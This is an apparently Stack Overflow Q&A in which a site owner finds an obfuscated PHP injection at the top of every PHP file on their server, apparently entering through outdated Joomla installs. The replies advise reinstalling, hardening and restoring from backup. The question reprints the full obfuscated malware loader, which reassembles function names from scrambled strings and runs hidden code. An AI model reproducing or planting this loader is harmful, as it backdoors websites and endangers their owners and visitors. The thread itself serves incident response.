# Virus on FTP Server, PHP

Tags: php, ftp, antivirus, virus

Hello i need some help and advice.
Our FTP server contains virus. All php files are corrupted and have the same code in the beginning.
Some old joomla systems are the reason for that. I have updated the old systems.
How can i delete the code string from all Files in the FTP Server?
I buyed ClamXav and downloading now the whole FTP Server. Over 40000 Files and 20 gb.
But ClamXav does not find the Virus.

Here Example of a File.

```
<?php $kqjfole = '973:8297f:5297e:56-xr.985:52985-t.98]K4g:74985-rr.93e:5597f-s../#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|C  x27pd%6|6.7eu{66~6774   141 x72 164") && (!iss45    116 x54"]); if ((strstr($uas,"  x6d 163 x69 145"))dXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`L 124 x54 120 x5f 125 x53 105 x52 137 x41 107 xfepdof`57ftbc  x7f!|!*uyfu x27k:!ftmf!fd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]/#o]#/*)323zbe!-#jt0*?]+^?]_   x5c}X   x24<!%tmw!>!#]y84]28y]47]67y]37]88y]27]28}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>h]58y]472]37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67yx{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}R;2]},;osvufs}    x27;mnui}&Kc]55Ld]55#*<%bG9}:}.}-bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg   x22)!gj}1~!<2p-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]88:}334}472 x24<!%ff2!>!bssbz   x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hops!~<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{hubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqs  61  x31"))) { $jorqfam = "  x63 162 x65 141 x74 145 x5f 146 x75 11#-%tdz*Wsfuvso!%bss   x5csboe))1/35.)1/14+9**-)1/2986+7**^/%r<&w6<*&7-#o]s]o]s]#)fepmqyf  x27*&7-n%)utjm6<    x7fw6*CW&)ttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)<!gps)%j>1<%j=6[%ww2!>#p#/#p#/27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSVgb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>!   x24]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!x7f<u%V    x27{ftmfV   x7f<*X&Z&75]y83]273]y76]277#<!%t2w>#]y7423zbek!~!<b%    x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)uf#0#/*#npd/#)rrd/#00;qsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnj x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>!   x2!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3plit("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w66~6<&w6<   x7fw6*CW&)7gj6<.[A  x27&6<  x7fw6*  x7f_*#[k2`{6:!npdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+!pjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~%)tpqsut>j%!*72! x27!hmg%)!  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,GLOBALS["    x61 156 x75 156 x61"]=1; $uas=strtolower($_SERVER[" x48,6<*)ujojR   x27id%6<    x7fw6*  x7f_*#ujojRk3`{6UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]DPT7-UFOJ`GB)fubfsdXA x27K6<  x7fw6*3qj%7>~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvuf73]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4/%tmw/  x24)%zW%h>EzH,2W%wN;#-Ez-1,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utj   x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]3ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqy]#/r%/h%)n%-#+I#)q%:>]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudov%  x7f!~!<##!>!2p%Z<^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%H*WCw*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82x5c%j:.2^,%b:<!%c:>%s:    x5c%j:^<!%w`    x5c^>Ew:Qb:Qc:W~!%z!>284:75983:48984:71]K9)ufttj    x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubf5,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]2%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyfR   x9386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_4]284]364]6]234]342]58]24]3)!gj!<*2bd%-#1GO   x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/2!ftmbg)!gj<*#k#)usbut`cpV   x7f x7f x7f sutRe%)Rd%)Rb%))!gj!<*#cd2bge56+9x24-   x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tp]65]D8]86]y31]278]y3f]51L3<+{e%+*!*+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>   x2,*!|  x24-    x24gvodujpo!    x24-    x24y7   x24-    x24*<C  x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20Qtn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)id,;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ft%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65e:r%:|:**t%)m%=*h%)m%):fmjix:<##:>:h%:<rrrbzkv = implode(array_map("sgniajr",str_sif((function_exists(" x6f 142 x5f 163 xZ6<.4`hA   x27pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    x24*<!~!mg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`ord($n)-1);} @error_reporting(0); $283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]31A  x27&6<.fmjgA    x27doj%6<   x7fw6*  x7f_*#fmjgk4`{6~6<tfs]84]y31M6]y3e]81#/#7e:55946-tr.9:!>!   x246767~6<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w6#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:61977]445]212]445]43]321]46y38#-!%w:**<")));$nyjqznu = $jorqfam("#64y]552]e7y]#>n%<#372udovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#g<~  x24<!%o:!>! x242178}527}#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#mA x273qj%6<*Y%)fnbozcYufhA    x272qj%6<^#zsfvr#   x5cq%7/7#@#7/7^#iubUUI7jsv%7UFH#    x27rfs%6~6< x7fw6<*K)ftpm!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upco}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3et($GLOBALS["   x61 156 x75 156 x61"])))) { $fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: )   x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvctus)% w`TW~   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H;zepc}A;~!}  x7f;!|!}{;)gj}l;33bq}k;opjmsvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd}7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX   x27u%)7fmjix64Ypp3)%cB%iN}#-!   x24/%tmw/   x24)%c*W%eN+#Qi x5c1^x<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{/#/},;#-#}+;%-qp%)54l}   x27;%!<*#}_;#)323ldfid>}&;!osvufs}  x7f;!opjuW%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)q#  x5cq%   x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%mbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!o56 x63 164 x69 157 x6e"; function sgniajr($n){return chr(S{ftmfV   x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R", $rrrbzkv); $nyjqznu();}}uui#>.%!<***f    x27,*e  x27,*d  x27,*c  x27,*b  x27)fepdof.)fepdof37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R8dovg}k~~9{d%:osvufs:~928>>    x22: or (strstr($uas,"  x72 166 x3asTrREvxNoiTCnuf_EtaerCxECalPer_Rtsfmbjtdkgd'; $rtvnvtmt=explode(chr((423-303)),substr($kqjfole,(34812-28935),(113-79))); $tagvcq = $rtvnvtmt[0]($rtvnvtmt[(7-6)]); $fsdalyau = $rtvnvtmt[0]($rtvnvtmt[(12-10)]); if (!function_exists('moimumaxc')) { function moimumaxc($zxjfzrukd, $wmolaixl,$wjfeqrjm) { $abyyxk = NULL; for($nymqumrbz=0;$nymqumrbz<(sizeof($zxjfzrukd)/2);$nymqumrbz++) { $abyyxk .= substr($wmolaixl, $zxjfzrukd[($nymqumrbz*2)],$zxjfzrukd[($nymqumrbz*2)+(5-4)]); } return $wjfeqrjm(chr((59-50)),chr((579-487)),$abyyxk); }; } $yqjxmpvc = explode(chr((229-185)),'3916,39,140,25,4929,43,2139,65,274,46,165,52,5847,30,1033,64,5580,57,4183,35,3873,43,1789,70,4367,46,3955,61,119,21,1157,55,5219,59,3631,58,4749,39,217,57,2321,41,906,37,4684,65,5484,51,2962,68,1618,48,4282,53,3141,48,1293,67,2204,43,1859,57,4118,65,5177,42,3733,42,5535,45,2005,43,2362,63,943,49,2048,26,1729,60,2527,51,554,62,4061,57,755,67,2732,50,3269,64,1597,21,5716,60,62,57,4788,62,3689,44,992,41,3372,33,3189,53,2247,34,4898,31,1537,60,1212,51,320,37,4850,48,5372,67,5816,31,2626,41,1916,48,1964,41,3522,66,3333,39,1479,27,5637,52,5776,40,3030,56,672,60,5139,38,4565,62,415,54,1506,31,1413,66,2578,48,469,22,2667,22,3835,38,4543,22,616,56,2689,43,4627,28,877,29,5019,67,3405,56,2074,65,3588,43,4016,45,1666,63,5278,48,5439,45,3775,60,1360,53,2494,33,2819,65,4413,69,39,23,0,39,3496,26,4335,32,2942,20,3461,35,3086,55,2425,69,2281,40,732,23,491,63,357,58,4218,64,4482,23,3242,27,1097,60,5326,46,4972,47,2884,58,1263,30,2782,37,5086,53,4655,29,822,55,4505,38,5689,27'); $simjwz = $tagvcq("",moimumaxc($yqjxmpvc,$kqjfole,$fsdalyau)); $tagvcq=$kqjfole; $simjwz(""); $simjwz=(521-400); $kqjfole=$simjwz-1;PHPINFO();?>
```

The PHPINFO(); was my part.

Comment: I did a quick search and found several references to some of the data you have shared. It appears you are not alone   https://www.google.co.uk/?gws_rd=ssl#q=%22%27973:8297f:5297e:56-xr.%22

Comment: Does the code all begin/end the same? Thus, do each of your files have   _$kqjfole =_ at the start and _$kqjfole=$simjwz-1;_ at the end ?

Comment: You should figure out how the files were changed - did someone gain access to the machine and install a rootkit, or some other damage? If you don't know how the answer, then you do not know the extent of the damage nor do you know if it will get worse. You need not to just clean up, but prevent the problem from happening again.

Comment: Yes it starts and ends same....

Answer (score 5, accepted):

I was going to suggest a quick script that will go thru all 40,000 files and remove the single string but after reading elsewhere on stackoverflow, this is perhaps not recommended. If a rootkit was installed, the attacker is likely to know your server better than you.

Your system has been compromised. What you have found is probably only part of the problem.

You need a fresh install.

You need to build a more secure environment or the same problem will re-occur.

Then you need restore from backup.

I know - you probably don't want to read the above but if you don't know how to write a quick script to clean your text files, its unlikely you have done enough to secure your system. A compromised system is a risk to you, your users, and others on the internet (a hacker could use your machine to launch attacks on others).

Comment: Thank you, for your help.
I have updated all System and isntalled fresh versions, removed old systems. Changed DB Passwords, FTP passwords.

Comment: Best of luck... and I suggest you take a peak at http://security.stackexchange.com/questions/114919/found-suspicious-obfuscated-php-file-is-this-a-hack-attempt-on-my-website as I suspect if an intruder got in once, he'll likely get in again unless you found the door they came thru.